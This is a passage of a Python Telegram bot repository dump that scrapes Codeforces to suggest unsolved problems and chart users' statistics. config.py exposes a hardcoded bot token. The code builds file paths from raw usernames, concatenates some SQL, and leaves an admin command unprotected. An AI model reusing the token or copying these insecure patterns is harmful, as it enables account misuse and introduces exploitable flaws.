values (?)\", (tag, str(link)))\n theory.commit()\n theory.close()" }, { "alpha_fraction": 0.6580531597137451, "alphanum_fraction": 0.6626046299934387, "avg_line_length": 39.30769348144531, "blob_id": "dc74ac352d2375bab83aec668428e8f2f2a7f13b", "content_id": "175a69c035a975a17e24c643632110ae8d30d59b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6811, "license_type": "no_license", "max_line_length": 175, "num_lines": 169, "path": "/bot.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n#CFTrainingBot\nimport config\nimport telebot\nimport bases.createuserbase\nimport bases.createcfbase\nimport bases.problem\nimport sqlite3\nimport os\nimport bases.update\n\nbot = telebot.TeleBot(config.token)\n\n\ndef get_current_state(chat_id):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__))+\"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"select * from users where chat_id = ?\", (str(chat_id),))\n name = conn.fetchone()\n if name != None:\n return name[4]\n else:\n return False\n settings.close()\n\ndef set_state(chat_id, value):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"update users set state = ? where chat_id = ?\", (str(value), str(chat_id)))\n settings.commit()\n settings.close()\n\[email protected]_handler(commands = ['help'])\ndef show_help(message):\n s = ''\n s += \"/login - to authorization.\\n\"\n s += \"/task - to get random unsolved task.\\n\"\n s += \"/theory - to get theory for chosen tag.\\n\"\n s += \"/stats - to see your statistic.\"\n bot.send_message(message.chat.id, \"Type:\\n\" + s)\n\n\[email protected]_handler(commands=['start'])\ndef sayhellotoeveryone(message):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n bot.send_message(message.chat.id, \"Hello!\")\n bot.send_message(message.chat.id, \"Type /help to see list of commands.\")\n conn.execute(\"insert into users values (?, ?, ?, ?, ?)\", (str(message.chat.id), \"None\", \"NULL\", \"0\", config.States.S_START.value))\n settings.commit()\n settings.close()\n\n\n#Not available for users\[email protected]_handler(commands=['add'])\ndef add_theory(message):\n bot.send_message(message.chat.id, \"Gimme tag and link\")\n set_state(message.chat.id, config.States.S_THEORY_ADDING.value)\n\n\[email protected]_handler(func = lambda message: get_current_state(message.chat.id) == config.States.S_THEORY_ADDING.value)\ndef add_theory2(message):\n s = message.text.split()\n bases.update.update_theory_base(s[0], s[1])\n set_state(message.chat.id, config.States.S_START.value)\n\n\[email protected]_handler(commands=['theory'])\ndef get_theory(message):\n bot.send_message(message.chat.id, \"Print tag for theory.\\nList of tags:\\n - math \\n - dp \\n - greedy \\n - strings \\n - trees \\n - graphs \\n - geometry \\n - combinatorics\")\n set_state(message.chat.id, config.States.S_THEORY.value)\n\n\[email protected]_handler(func = lambda message: get_current_state(message.chat.id) == config.States.S_THEORY.value)\ndef get_theory2(message):\n bot.send_message(message.chat.id, str(bases.problem.get_theory_from_tag(message.text)))\n set_state(message.chat.id, config.States.S_START.value)\n\n\[email protected]_handler(commands =['login'])\ndef get_login(message):\n settings = 
sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"select * from users where chat_id = ?\", (str(message.chat.id),))\n name = conn.fetchone()\n if name != None:\n bot.send_message(message.chat.id, \"Previous handle: \" + str(name[1]))\n else:\n bot.send_message(message.chat.id, \"Previous handle: None\")\n settings.close()\n bot.send_message(message.chat.id, \"Type new handle: \")\n set_state(message.chat.id, config.States.S_LOGIN.value)\n\n\[email protected]_handler(func = lambda message: get_current_state(message.chat.id) == config.States.S_LOGIN.value)\ndef get_login2(message):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n if bases.createuserbase.check_username(message.text):\n bot.send_message(message.chat.id, \"Invalid handle.\")\n set_state(message.chat.id, config.States.S_START.value)\n return 0\n conn.execute(\"select * from users where chat_id = ?\", (str(message.chat.id),))\n name = conn.fetchone()\n settings.close()\n bases.update.cf_update()\n bases.createuserbase.clean_base(name[1])\n bases.createuserbase.clean_base(message.text)\n bot.send_message(message.chat.id, \"Creating base...\")\n bases.createuserbase.init_user(message.text, message.chat.id)\n bot.send_message(message.chat.id, \"Done!\")\n set_state(message.chat.id, config.States.S_START.value)\n\n\[email protected]_handler(commands=['task'])\ndef task(message):\n s = \"Which kind of task you need?\\n\"\n s += \"List of tags:\\n - math \\n - dp \\n - greedy \\n - strings\"\n s += \"\\n - trees \\n - graphs \\n - geometry \\n - combinatorics\"\n s += \"\\nYou may combine tags and difficults e.x. write '\"'dp math AB'\"' to get task with these tags and difficults.\"\n bot.send_message(message.chat.id, s)\n set_state(message.chat.id, config.States.S_GET_TASK.value)\n\n\[email protected]_handler(func = lambda message: get_current_state(message.chat.id) == config.States.S_GET_TASK.value)\ndef get_task(message):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"select * from users where chat_id = ?\", (str(message.chat.id),))\n name = conn.fetchone()\n settings.close()\n if name == None:\n bot.send_message(message.chat.id, \"You should login before get tasks.\")\n else:\n bases.update.update_user(name[1], name[0], name[2])\n bot.send_message(message.chat.id, bases.problem.get_unsolved_problem(message.text, name[1]))\n set_state(message.chat.id, config.States.S_START.value)\n\n\[email protected]_handler(commands=['stats'])\ndef stats(message):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"select * from users where chat_id = ?\", (str(message.chat.id),))\n name = conn.fetchone()\n settings.close()\n if name != None:\n bases.update.update_user(name[1], name[0], name[2])\n bases.problem.create_text_stats(name[1])\n img = open(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\users\\\\\" + name[1] + \".png\", \"rb\")\n bot.send_photo(message.chat.id, img)\n img.close()\n if bases.problem.create_stats_picture(name[1]):\n bot.send_message(message.chat.id, \"Sorry, you haven't solved tasks.\")\n return 0\n img = open(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\users\\\\\" + name[1] + \".png\", \"rb\")\n bot.send_photo(message.chat.id, img)\n 
img.close()\n else:\n bot.send_message(message.chat.id, \"You should login before getting statistic.\")\n\n\[email protected]_handler(content_types=['text'])\ndef reply(message):\n bot.send_message(message.chat.id, \"Hmm...\")\n\n\nif __name__ == '__main__':\n bot.polling(none_stop = True)" }, { "alpha_fraction": 0.5541045069694519, "alphanum_fraction": 0.5630596876144409, "avg_line_length": 36.74647903442383, "blob_id": "b049cc951d09c399c27173c4ce8d3cd22be61c40", "content_id": "0df997f55693273cd79372706f8f02e1f0ea8f8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2680, "license_type": "no_license", "max_line_length": 129, "num_lines": 71, "path": "/bases/createcfbase.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "import requests\nimport sqlite3\nimport os\nfrom bs4 import BeautifulSoup\navailable_tags = {'math', \"strings\", \"trees\", \"graphs\", \"dp\", \"greedy\", \"geometry\", \"combinatorics\"}\n\ndef create_cf_base():\n url = 'http://codeforces.com/problemset/'\n r = requests.get(url)\n max_page = 0\n soup = BeautifulSoup(r.text, \"lxml\")\n base = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\cf.db\")\n conn = base.cursor()\n conn.execute(\"create table problems (problem INTEGER, diff CHAR)\")\n for i in available_tags:\n conn.execute(\"create table ? (problems INTEGER, diff CHAR)\", (i,))\n\n for link in soup.find_all(attrs={\"class\" : \"page-index\"}):\n s = link.find('a')\n s2 = s.get(\"href\").split('/')\n max_page = max(max_page, int(s2[3]))\n\n a = 0\n b = 0\n f = False\n for i in range(1, max_page + 1):\n r = requests.get('http://codeforces.com/problemset/' + '/page/' + str(i))\n soup = BeautifulSoup(r.text, \"lxml\")\n old = ''\n for link in soup.find_all('a'):\n s = link.get('href')\n if s != None and s.find('/problemset') != -1:\n s = s.split('/')\n if len(s) == 5 and old != s[3] + s[4]:\n a = s[3]\n b = s[4]\n old = s[3] + s[4]\n if not f:\n f = True\n last_update = old\n conn.execute(\"insert into problems values (?, ?)\", (a, b))\n if len(s) == 4 and s[3] in available_tags:\n conn.execute(\"insert into ? 
values (?, ?)\", (s[3], a, b))\n\n base.commit()\n base.close()\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"create table users (chat_id INTEGER, username STRING, last_update STRING, last_problem STRING, state INTEGER)\")\n conn.execute(\"create table last_update_problemset (problem STRING)\")\n conn.execute(\"insert into last_update_problemset values (?)\", (last_update, ))\n settings.commit()\n settings.close()\n\n\ndef create_theory_table(): #create EMPTY theory table\n theory = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\theory.db\")\n conn = theory.cursor()\n for i in available_tags:\n conn.execute(\"create table \" + i + \" (link STRING)\")\n theory.commit()\n theory.close()\n\n\npath = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'cf.db')\nif not os.path.exists(path):\n create_cf_base()\n\npath = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'theory.db')\nif not os.path.exists(path):\n create_theory_table()\n" }, { "alpha_fraction": 0.508474588394165, "alphanum_fraction": 0.5423728823661804, "avg_line_length": 16.5, "blob_id": "0fef44d39eb35bed6465b5fc878aa17afab4f7a3", "content_id": "a7e3f1ca457443192677c053033a0e4679c1a103", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 23, "num_lines": 10, "path": "/config.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\ntoken = '461438069:AAG9IElm7TwFhLmheTpPmwYKn2xOqPWrLBw'\nfrom enum import Enum\n\nclass States(Enum):\n S_START = 0\n S_LOGIN = 1\n S_GET_TASK = 2\n S_THEORY = 3\n S_THEORY_ADDING = 4\n\n\n" }, { "alpha_fraction": 0.5890411138534546, "alphanum_fraction": 0.6014225482940674, "avg_line_length": 36.19607925415039, "blob_id": "192d37686765bb4df1e2e17c7913bc801370ad1b", "content_id": "f99fb1728a174a6f8b97a98be771c91eb2201bbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7896, "license_type": "no_license", "max_line_length": 148, "num_lines": 204, "path": "/bases/problem.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "#Ребята, не стоит вскрывать этот код.\n#Вы молодые, хакеры, вам все легко. Это не то.\n#Это не Stuxnet и даже не шпионские программы ЦРУ. Сюда лучше не лезть.\n#Серьезно, любой из вас будет жалеть. 
Лучше закройте компилятор и забудьте что там писалось.\n#Я вполне понимаю что данным сообщением вызову дополнительный интерес, но хочу сразу предостеречь пытливых - стоп.\n#Остальные просто не найдут.\n\nimport sqlite3\nimport os\nimport random\nimport matplotlib.pyplot as plt\n\navailable_tags = ['math', \"strings\", \"trees\", \"graphs\", \"dp\", \"greedy\", \"geometry\", \"combinatorics\"]\navailable_diff = ['A', 'B', 'C', 'D', 'E', 'F']\ncolors = ['red', 'green', 'tan', 'blue', 'purple', 'orange']\n\ndef checking_request_tags(tag):\n list_of_current_tags = list()\n for i in available_tags:\n if i in tag:\n list_of_current_tags.append(i)\n\n if len(list_of_current_tags) == 0:\n return available_tags.copy()\n\n return list_of_current_tags\n\n\ndef find_intersection(tasks, tag, username):\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n cursor2.execute(\"SELECT * FROM \" + tag)\n a = list()\n problem_and_diff = cursor2.fetchone()\n while problem_and_diff != None:\n cursor.execute(\"SELECT * FROM result WHERE problem = ? AND diff = ? AND NOT verdict = 'OK'\", (problem_and_diff[0], problem_and_diff[1]))\n problem_and_diff_and_ok = cursor.fetchone()\n if problem_and_diff_and_ok != None and problem_and_diff_and_ok in tasks:\n a.append(problem_and_diff_and_ok)\n problem_and_diff = cursor2.fetchone()\n conn.close()\n conn2.close()\n return a\n\n\ndef get_array_of_tasks(tags_array, tasks, username):\n for i in range(1, len(tags_array)):\n tasks = find_intersection(tasks, tags_array[i], username)\n return tasks\n\n\ndef checking_request_diff(tag):\n list_of_current_diff = list()\n for i in available_diff:\n if i in tag:\n list_of_current_diff.append(i)\n if len(list_of_current_diff) == 0:\n return available_diff.copy()\n return list_of_current_diff\n\n\ndef get_unsolved_problem(tag, username):\n tasks = list()\n list_of_current_tags = checking_request_tags(tag)\n list_of_current_diff = checking_request_diff(tag)\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n cursor2.execute(\"SELECT * FROM \" + list_of_current_tags[0])\n problem_and_diff = cursor2.fetchone()\n while problem_and_diff != None:\n if problem_and_diff[1] in list_of_current_diff:\n cursor.execute(\"SELECT * FROM result WHERE problem = ? AND diff = ? 
AND NOT verdict = 'OK'\", (problem_and_diff[0], problem_and_diff[1]))\n problem_and_diff_and_ok = cursor.fetchone()\n if problem_and_diff_and_ok != None:\n tasks.append(problem_and_diff_and_ok)\n problem_and_diff = cursor2.fetchone()\n conn.close()\n conn2.close()\n tasks = get_array_of_tasks(list_of_current_tags, tasks, username)\n random.seed()\n if len(tasks) > 0:\n ind1 = random.randint(0, len(tasks) - 1)\n s1 = str(tasks[ind1][0]) + '/' + tasks[ind1][1]\n tasks.pop(ind1)\n return 'http://codeforces.com/problemset/problem/' + s1\n else:\n return \"You have solved all tasks with this tag, nice!\"\n\ndef get_theory_from_tag(tag):\n if not tag in available_tags:\n return \"Incorrect tag.\"\n\n base = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\theory.db\")\n conn = base.cursor()\n conn.execute(\"select * from \" + tag)\n x = conn.fetchone()\n s = \"\"\n while x != None:\n s += str(x[0]) + '\\n'\n x = conn.fetchone()\n base.close()\n return s\n\nclass Pair():\n def __init__(self, first, second):\n self.first = first\n self.second = second\n\ndef count_stats(username):\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n list_tags_stats = list()\n\n for i in available_tags:\n cursor2.execute(\"SELECT * FROM \" + str(i))\n x = cursor2.fetchone()\n count = 0\n while x != None:\n cursor.execute(\"SELECT * FROM result WHERE problem = ? AND diff = ? AND verdict = 'OK'\", (x[0], x[1]))\n y = cursor.fetchone()\n if y != None:\n count += 1\n x = cursor2.fetchone()\n list_tags_stats.append(Pair(count, i))\n conn.close()\n conn2.close()\n return list_tags_stats\n\ndef create_stats_picture(username):\n data_for_plot = list()\n leg = list()\n list_tags_stats = count_stats(username)\n sum = 0\n for i in range(len(list_tags_stats)):\n sum += list_tags_stats[i].first\n for i in range(len(list_tags_stats)):\n if list_tags_stats[i].first / sum != 0:\n data_for_plot.append(list_tags_stats[i].first / sum)\n leg.append(list_tags_stats[i].second)\n\n fig1, ax1 = plt.subplots()\n ax1.pie(data_for_plot, autopct='%1.1f%%',\n shadow=True, startangle=90)\n ax1.axis('equal')\n ax1.legend(leg)\n path = os.path.join(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\", username + '.png')\n if os.path.exists(path):\n os.remove(path)\n plt.savefig(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + \".png\")\n plt.close()\n return False\n\n\ndef count_stats_for_second_plot(username):\n verdict = {\"COMPILATION_ERROR\": 0, \"OK\": 0, \"TIME_LIMIT_EXCEEDED\": 0, \"WRONG_ANSWER\": 0, \"RUNTIME_ERROR\": 0,\n \"MEMORY_LIMIT_EXCEEDED\": 0}\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n count = 0\n for i in available_tags:\n cursor2.execute(\"SELECT * FROM \" + str(i))\n x = cursor2.fetchone()\n while x != None:\n cursor.execute(\"SELECT * FROM result WHERE problem = ? 
AND diff = ?\", (x[0], x[1]))\n y = cursor.fetchone()\n if y != None:\n for j in verdict.keys():\n if y[2] == j:\n verdict[j] += 1\n count += 1\n\n x = cursor2.fetchone()\n return verdict\n conn.close()\n conn2.close()\n\n\ndef create_text_stats(username):\n list_tags_stats = list()\n data_for_plot = list()\n verdict = count_stats_for_second_plot(username)\n for i in verdict.keys():\n list_tags_stats.append(i)\n data_for_plot.append(verdict[i])\n fig1, ax1 = plt.subplots()\n ax1.pie(data_for_plot, labels = data_for_plot, colors = colors,\n shadow=True, startangle=90)\n ax1.axis('equal')\n ax1.legend(list_tags_stats)\n ax1.set_title('How many different verdict in last status of problem you have: ')\n path = os.path.join(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\", username + '.png')\n if os.path.exists(path):\n os.remove(path)\n plt.savefig(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + \".png\")\n plt.close()\n return True\n\n\n\n\n" }, { "alpha_fraction": 0.5495448708534241, "alphanum_fraction": 0.5622887015342712, "avg_line_length": 42.21348190307617, "blob_id": "df29d72b00a9b09f5faa74ab0e8e7eb09957fcb7", "content_id": "8ed686d74b22b051a3aa87d54c3f7006b9162dd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3845, "license_type": "no_license", "max_line_length": 125, "num_lines": 89, "path": "/bases/createuserbase.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "import requests\nimport sqlite3\nimport os\nfrom bs4 import BeautifulSoup\n\n\ndef check_username(username):\n if username == \"\":\n return True\n if len(username.split()) > 1:\n return True\n r = requests.get('http://codeforces.com/submissions/' + username)\n soup = BeautifulSoup(r.text, \"lxml\")\n if soup.find(attrs={\"class\":\"verdict\"}) == None:\n return True\n return False\n\n\ndef clean_base(username):\n path = os.path.join(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n if os.path.exists(path):\n os.remove(path)\n\n\ndef init_user(username, chat_id):\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n cursor.execute(\"CREATE TABLE result (problem INTEGER, diff STRING, verdict STRING)\")\n cursor2.execute(\"SELECT * FROM problems\")\n x = cursor2.fetchone()\n while x != None:\n cursor.execute(\"insert into result values (?, ?, ? 
)\", (x[0], x[1], \"NULL\"))\n x = cursor2.fetchone()\n\n url = 'http://codeforces.com/submissions/' + username\n r = requests.get(url)\n max_page = 1\n soup = BeautifulSoup(r.text, \"lxml\")\n\n for link in soup.find_all(attrs={\"class\": \"page-index\"}):\n s = link.find('a')\n s2 = s.get(\"href\").split('/')\n max_page = max(max_page, int(s2[4]))\n r = requests.get('http://codeforces.com/submissions/' + username + '/page/0')\n soup = BeautifulSoup(r.text, \"lxml\")\n last_try = soup.find(attrs={\"class\":\"status-small\"})\n if not last_try == None:\n last_try = str(last_try).split()\n last_try = str(last_try[2]) + str(last_try[3])\n\n for i in range(1, max_page + 1):\n r = requests.get('http://codeforces.com/submissions/' + username + '/page/' + str(i))\n soup = BeautifulSoup(r.text, \"lxml\")\n count = 0\n ver = soup.find_all(attrs={\"class\": \"submissionVerdictWrapper\"})\n for link in soup.find_all('a'):\n s = link.get('href')\n if s != None and s.find('/problemset') != -1:\n s = s.split('/')\n if len(s) == 5:\n s2 = str(ver[count]).split()\n s2 = s2[5].split('\\\"')\n count += 1\n cursor.execute(\"select * from result where problem = ? and diff = ?\", (s[3], s[4]))\n x = cursor.fetchone()\n if s2[1] == 'OK' and x != None:\n cursor.execute(\"update result set verdict = ? where problem = ? and diff = ?\", (s2[1], s[3], s[4]))\n if x != None and x[2] != 'OK':\n cursor.execute(\"update result set verdict = ? where problem = ? and diff = ?\", (s2[1], s[3], s[4]))\n conn.commit()\n conn.close()\n conn2.close()\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"select * from last_update_problemset\")\n last_problem = conn.fetchone()\n conn.execute(\"select * from users where chat_id = ?\", (str(chat_id),))\n x = conn.fetchone()\n if x == None:\n conn.execute(\"insert into users values (?, ?, ?, ?, ?)\", (chat_id, username, str(last_try), str(last_problem[0]), 1))\n else:\n conn.execute(\"update users set username = ? where chat_id = ?\", (str(username), str(chat_id)))\n conn.execute(\"update users set last_update = ? where chat_id = ?\", (str(last_try), str(chat_id)))\n conn.execute(\"update users set last_problem = ? where chat_id = ?\", (str(last_problem[0]), str(chat_id)))\n conn.execute(\"update users set state = ? where chat_id = ?\", (str(1), str(chat_id)))\n settings.commit()\n settings.close()" } ]
6
KhazanahAmericasInc/sensortower-dashboard
https://github.com/KhazanahAmericasInc/sensortower-dashboard
281b91334205f9e3d052bad7f0574726ec84647f
b692d35f7d2a0bd457812ca3e438ad9041a10c56
f354e77fac54bcd63eaec1cd568eb0c0beb7edb8
refs/heads/master
2020-04-20T02:15:57.560857
2019-02-07T03:10:31
2019-02-07T03:10:31
168,567,149
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6648044586181641, "alphanum_fraction": 0.6703910827636719, "avg_line_length": 26.55384635925293, "blob_id": "a10ccbc9f6cac50ac988adde122ddfd8eebcf5e8", "content_id": "7836e3c932c02f14d407f480025af3269cba754e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1790, "license_type": "no_license", "max_line_length": 107, "num_lines": 65, "path": "/main.py", "repo_name": "KhazanahAmericasInc/sensortower-dashboard", "src_encoding": "UTF-8", "text": "from flask import Flask\nfrom flask import render_template\nimport pyrebase\napp = Flask(__name__)\n\nconfig = {\n\t\"apiKey\": \"AIzaSyCUeQILRjIK7-3om5eyIWwFOYx4YPHOvaY\",\n \"authDomain\": \"sensortower-dashboard.firebaseapp.com\",\n \"databaseURL\": \"https://sensortower-dashboard.firebaseio.com\",\n\t\"storageBucket\": \"sensortower-dashboard.appspot.com\",\n\t\"serviceAccount\": \"./auth/sensortower-dashboard-firebase-adminsdk-xuy2n-65d15773de.json\" \n}\nfirebase = pyrebase.initialize_app(config)\n\n# auth = firebase.auth()\n# user = auth.sign_in_with_email_and_password(\"[email protected]\", \"kai-2019\")\n\ndb=firebase.database()\n\[email protected]('/')\ndef hello():\n\tvehicle_data = get_all_data()\n\tvehicle_data_arr = get_all_data_arrs()\n\treturn render_template(\"dashboard.html\", vehicle_data = vehicle_data, vehicle_data_arr = vehicle_data_arr)\n\n# def push_data(latitude, longitude):\n# \tnew_car = {\"name\": \"Car1\", \"location\": {\"latitude\":latitude,\"longitude\":longitude}}\n# \tdata={\"name\":\"test\"}\n# \tdb.child(\"cars-spotted\").push(new_car)\n# \tusers = db.child('cars-spotted').get()\n# \tprint(users.val())\n# \t# db.child(\"users\").push()\n\n# @app.route('/get_data', methods=[\"GET\", \"POST\"])\ndef get_all_data():\n\tvehicles = db.child('vehicles').get()\n\tvehicles_array = []\n\tfor vehicle in vehicles.each():\n\t\tvehicles_array.append(vehicle.val())\n\t# print(vehicles_array)\n\t# print(vehicles_array[0])\n\t# print(len(vehicles_array))\n\treturn vehicles_array\n\ndef get_all_data_arrs():\n\tvehicles = db.child('vehicles').get()\n\tvehicles_array = []\n\tfor vehicle in vehicles.each():\n\t\tv_obj = vehicle.val()\n\t\tv_arr = []\n\t\tfor k, v in v_obj.items():\n\t\t\tif(k!=\"img_data\"):\n\t\t\t\tv_arr.append(v)\n\t\t\telse:\n\t\t\t\tfor k_i,v_i in v.items():\n\t\t\t\t\tv_arr.append(v_i)\n\t\tvehicles_array.append(v_arr)\n\n\treturn vehicles_array\n\n# get_all_data_arrs()\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)" }, { "alpha_fraction": 0.7773972749710083, "alphanum_fraction": 0.789383590221405, "avg_line_length": 17.80645179748535, "blob_id": "267344d218439744998868fe747c32900728c25c", "content_id": "b798861f893b880430d42ddeeffb355615715b6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 584, "license_type": "no_license", "max_line_length": 81, "num_lines": 31, "path": "/README.md", "repo_name": "KhazanahAmericasInc/sensortower-dashboard", "src_encoding": "UTF-8", "text": "Displays the information on the sensortower in a web app.\n\nSetup instuctions:\n\n1.) Outside of the folder install virtualenv using:\n\npip3 install virtualenv\n\nThen create a virtual environment with:\n\nvirtualenv venv\n\n2.) Activate the virtual environment with:\n\nsource venv/bin/activate\n\n3.) Go into the folder and install the dependencies specified by requirements.txt\n\npip3 install -r requirements.txt\n\n4.) 
Run the application by executing main.py:\n\npython3 main.py\n\nAlternatively, tell Flask the entry point for your app (on macOS/Linux use export instead of set):\n\nset FLASK_APP=main\n\nset FLASK_ENV=development\n\nflask run\n" } ]
2
ArvinZhang/py-workspace
https://github.com/ArvinZhang/py-workspace
a45c42f7fd8b81d9b7d5a1a5a457a2074a66d9f4
043ddb19946bcfdbcf7185f03c01cd9823a4ea66
d23d00153e637406cd280a86396362e933e6f721
refs/heads/master
2020-04-05T08:05:53.807879
2018-11-08T12:07:41
2018-11-08T12:07:41
156,700,946
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.49625083804130554, "alphanum_fraction": 0.5293115377426147, "avg_line_length": 18.691274642944336, "blob_id": "586d86af39d85d1db6a4e437b9bacffcdf151db5", "content_id": "96b05c230f5bdc62fd93cba88974af7b9bb79881", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2964, "license_type": "no_license", "max_line_length": 68, "num_lines": 149, "path": "/App1/BasicMethod.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport time\nimport calendar\nimport datetime\nimport ConnectionDB\nimport LamdaFun\nfrom component import Script1\nfrom component import Script2\n\n# foreach operation\ndef styForeach(list2):\n for name in list2:\n # name += \" String append\"\n if name.endswith(\"append\"):\n print \"true\"\n continue\n else:\n print \"false\"\n print name\n\n\n# python 操作list集合练习\ndef styList():\n # list\n list = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"];\n\n list1 = [\"a\", \"b\", \"c\", \"d\"];\n\n list2 = [\"Arvin\", \"tester1\", \"tester2\", \"other\"];\n\n # 输出指定的idex\n print 'println list ', list[1]\n\n # 输出index范围\n print 'println list ', list[1:5]\n\n print 'println list index 5 ', list[5]\n\n # update\n list2[0] = 'Zhang'\n\n print list2\n # remove\n del list2[3]\n # append\n list2.append(\"append list\")\n\n print \"my name is \", list2[0]\n return list2\n\n\n# tuple\ndef styTuple():\n tup1 = (\"Arvin\", \"Zhang\", \"Wu\", \"Xie\", \"Yuan\")\n tup2 = (1, 2, 3, 4, 5, 6, 7, 8)\n print \"tup1e length\", len(tup1)\n\n # 'tuple' object does not support item assignment\n # tup1[0]=\"chang\"\n\n for var in tup1:\n print var\n print tup1[1:]\n print tup1[-2]\n print \"max value\", max(tup2)\n print \"min value\", min(tup2)\n del tup1\n print \"after delete tuple\"\n # print tup1\n\n\ndef styDict():\n dict1 = {\"name\": \"wu\", \"age\": 18, \"occupation\": \"programmer\"};\n print type(dict1)\n\n if dict1.has_key(\"age\"):\n print \"find keys age\"\n\n print dict1.values()\n\n # print dict1.pop(\"age\")\n\n # add\n dict1['income'] = \"1W\"\n for row in dict1:\n\n print None == dict1.get(\"genar\")\n\n print \"set default:\", dict1.setdefault(row)\n\n if dict1.setdefault(\"age\") == 18:\n print \"find age is 18\"\n\n if \"age\" == row and int == type(dict1[row]):\n # find and update\n dict1[row] = 28\n else:\n print \"can't not found age\"\n print \"type is\", type(dict1[row])\n print row + \":\" + bytes(dict1[row])\n\n # copy dict\n dict2 = dict1.copy();\n # clear\n dict2.clear()\n\n print len(dict2)\n\n\ndef styTime():\n ticks = time.time()\n print ticks\n localTime = time.localtime(time.time())\n\n print time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())\n\n print time.timezone\n cal=calendar.month(2018,11)\n\n print calendar.isleap(2020)\n print cal\n #datetime\n i=datetime.datetime.now();\n print i\n print i.year\n\ndef main():\n print \">>>>>>>>>>>>>>>>>>mian test start>>>>>>>>>>>>>>>>>>\"\n # var =styList()\n\n # styForeach(styList());\n\n # styTuple();\n\n #styDict();\n\n #styTime();\n\n #print LamdaFun.sum(1,2);\n\n #reload(LamdaFun)\n\n Script1.script1()\n\n Script2.script2()\n print \"<<<<<<<<<<<<<<<<<<mian test end<<<<<<<<<<<<<<<<<<\"\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.5723951458930969, "alphanum_fraction": 0.575778067111969, "avg_line_length": 20.420289993286133, "blob_id": "a6475215692e9dee517b4455315e7262d1f8720b", "content_id": 